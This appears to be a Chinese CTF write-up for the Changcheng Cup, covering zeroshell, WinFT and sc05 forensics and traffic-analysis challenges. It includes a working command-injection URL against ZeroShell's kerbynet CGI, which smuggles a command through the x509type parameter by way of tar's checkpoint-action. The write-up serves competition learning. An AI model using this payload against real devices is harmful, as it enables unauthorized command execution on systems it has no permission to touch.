首页 > 其他分享 >长城杯

长城杯

时间:2024-12-16 17:32:26浏览次数:3  
标签:20 base64 长城 flag zeroshell WinFT 压缩包

长城杯

zeroshell_1

flag的base64是ZmxhZw==查找字符串Zmxh

img

http.referer == "ZmxhZ3s2QzJFMzhEQS1EOEU0LThEODQtNEE0Ri1FMkFCRDA3QTFGM0F9"

解码得到flag

zeroshell_2

上网搜到zeroshell POC,以及明文的管理员账号密码(流量包里也有)

image-20241216160643456

直接查看flag文件就行(或者虚拟机里 cat /flag)img

zeroshell_3

查看主机的外联服务器的所有TCP,UDP,IP和进程使用

payload打

http://61.139.2.100//cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec='netstat%20-ano%20'%0A'

或者虚拟机找

netstat -ano

img

WinFT_1

打开火绒剑->网络 看到爆红文件 拖到微步云沙箱检测

img将fluv文件后面的ip填上 得到完整的flag

img

WinFT_2

找到任务计划书 得到base64 解码

img

img

WinFT_5

流量包里找到flag.txt提取压缩包,解码压缩包末尾的base64得到压缩包密码

image-20241216172337773

解压缩得到flag

image-20241216172423193

sc05_1

根据提示 查找对应ip的请求时间 img

转换格式到大写md5 就是flag

img

标签:20,base64,长城,flag,zeroshell,WinFT,压缩包
From: https://www.cnblogs.com/Yolololo/p/18610718

相关文章

  • 第二届“长城杯”铁三赛小组WP(解题量少警告)
    三、解题过程1、Web安全Safe_Proxy操作内容:网页源代码为PythonfromflaskimportFlask,request,render_template_stringimportsocketimportthreadingimporthtmlapp=Flask(__name__)@app.route('/',methods=["GET"])defsource():withopen(__fil......
  • 2024长城杯初赛WinFT_1 writeup
    WinFT_1step.1先看题目flag格式是攻击机的域名+ip+端口step.2netstat-ao发现可疑的域名和端口结合题目附件恶意流量包的内容怀疑是192.168.116.130再加上火绒剑的帮助,确定是flvupdate再看看任务管理器,确认一下,毕竟flag有提交次数限制是后门程序step.......
  • 长城杯一些crypto随笔
            最近在做一些misc的训练,做累了,回归老本行放松一下高低位爆破#sage-pipinstallpycryptodomefromCrypto.Util.numberimport*fromsympyimportnextprimeimportosfromgmpy2import*classMyRSA():def__init__(self,flag:bytes,nbits......
  • 毫末智行IPO之路荆棘密布,深度绑定长城汽车或成绊脚石
    在自动驾驶的浪潮中,毫末智行曾被视为一颗冉冉升起的新星。然而,随着其IPO计划的波折和与长城汽车关系的复杂性逐渐浮出水面,这家企业的未来开始蒙上一层阴影。近日,关于长城汽车董事长魏建军暂时叫停毫末智行港股IPO的消息虽被毫末智行董事长张凯否认,但这一事件无疑加剧了市场对......
  • 海外销量不错,长城汽车因“重大失信影响恶劣”被南方电网拉黑
    《港湾商业观察》施子夫被南方电网“拉黑”的长城汽车(601633.SH;02333.HK)最近深陷旋涡。最新的消息是长城汽车道歉了。8月14日,中国南方电网供应链统一服务平台发布一则公告,公告称,为促进供应商诚信服务、保证产品质量、确保电网建设顺利进行及电网安全可靠运行,依据《中国南方......
  • 构建坚不可摧的数字长城:从“微软蓝屏”事件看网络安全与系统稳定性的重塑
    “微软蓝屏”事件暴露了网络安全哪些问题?近日,一次由微软视窗系统软件更新引发的全球性“微软蓝屏”事件,不仅成为科技领域的热点新闻,更是一次对全球IT基础设施韧性与安全性的深刻检验。这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗......
  • 长城杯CTF2024-PWN-kawayi复现
    文件保护libc版本uaf漏洞free函数没有进行置0操作GDB断点断点:0xD90泄漏libc由于v1>3会退出,所以必须在四次申请堆块中拿到shell第一次申请-创建largebinchunk因为创建largebin的chunk堆块,所以申请的是0x430第二次申请-创建tcachebinchunk申请一个tcache......
  • 《码农阿豪赠书第一期》618精选网络安全书单:打造数字世界的钢铁长城!
    ......
  • 长城电脑压缩文件丢失了怎么办?怎么解决
    在数字化时代,电脑已成为我们日常生活和工作中不可或缺的设备。长城电脑作为国内知名品牌,以其稳定可靠的性能赢得了广大用户的信赖。然而,即便是可靠的电脑,也难免会遇到一些问题。其中,压缩文件丢失无疑是一个令人头疼的难题。本文将围绕这一问题,探讨其可能的原因,并提供相应的解决......
  • 林草资源管理系统:构筑绿色长城,守护自然之美
    在全球气候变化和生态环境恶化的背景下,森林和草原资源的保护、恢复和合理利用显得尤为重要。林草资源管理系统的建立,旨在通过现代信息技术手段,提升林草资源管理的效率和质量,确保自然资源的可持续发展。项目背景森林和草原是地球上重要的生态系统,它们不仅为人类提供木材、食物等......